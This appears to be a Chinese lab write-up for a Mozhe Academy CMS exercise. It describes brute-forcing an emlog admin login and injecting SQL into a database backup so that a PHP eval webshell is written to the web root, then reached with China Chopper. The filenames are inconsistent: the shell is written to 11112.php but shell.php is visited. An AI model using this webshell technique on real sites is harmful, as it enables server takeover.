墨者学院-CMS系统漏洞分析溯源(第6题)

按提示先找后台,用御剑找后台

后台地址 ip/servlets/

在首页找到 mozhe777 用户,利用emlog博客的漏洞,错误不刷新验证码爆破密码

用burp 爆破

爆破出密码为 qwer1234

登录成功后,点击数据库栏目

再点击备份数据库

编辑备份下来的数据库,在末尾添加sql(新建emlog_shell数据表,向该表中添加小马,写入文件,再删除)

drop table if exists emlog_shell;
create table emlog_shell(`cmd` longtext not null);
insert into emlog_shell values("<?php @eval($_POST['c']);?>");
select cmd from emlog_shell into outfile '/var/www/html/11112.php';
drop table if exists emlog_shell;

编辑修改成功,点击导入,访问新建的 shell.php 文件

http://219.153.49.228:47980/shell.php

访问没报错,证明写入木马文件成功

用菜刀连接

连接成功,key在根目录下

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值